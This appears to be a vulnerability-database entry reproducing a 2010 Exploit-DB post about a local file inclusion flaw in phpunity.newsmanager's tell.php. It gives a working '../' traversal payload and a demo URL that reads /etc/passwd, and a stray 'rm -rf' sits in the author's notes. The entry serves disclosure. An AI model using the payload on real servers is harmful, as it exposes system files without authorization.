phpunity.newsmanager - Local file inclusion

vendor:

phpunity.newsmanager

by:

kaMtiEz

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: phpunity.newsmanager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

phpunity.newsmanager – Local file inclusion

A Local File Inclusion vulnerability exists in phpunity.newsmanager, which allows an attacker to include a file from the local system. This can be exploited to view sensitive files on the system by including files from the web root folder or by exploiting a vulnerability in an included file. The vulnerability is located in the 'id' parameter of the 'tell.php' script. An attacker can send a specially crafted request to the vulnerable script and include a file from the local system.

Mitigation:

No known mitigation is available.

Source

Exploit-DB raw data:

#############################################################################################################
## phpunity.newsmanager - Local file inclusion 	(id)	                                                   ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 28 januari, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.perlunity.de/
[+] Download : http://www.perlunity.de/php/scripts/phpunity.newsmanager.shtml
[+] version : -
[+] Vulnerability : LFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://server/[kaMtiEz]/misc/tell_a_friend/tell.php?id=[INDONESIANCODER]

[ EXPLOIT ]

../../../../../../../etc/passwd

[ DEMO ]

http://server/phpunity.newsmanager/phpunity-newsmanager/misc/tell_a_friend/tell.php?id=../../../../../../../etc/passwd


[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] to someone i dont know who u are .. but u are so hot ! :P~~
[+] rm -rf 

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..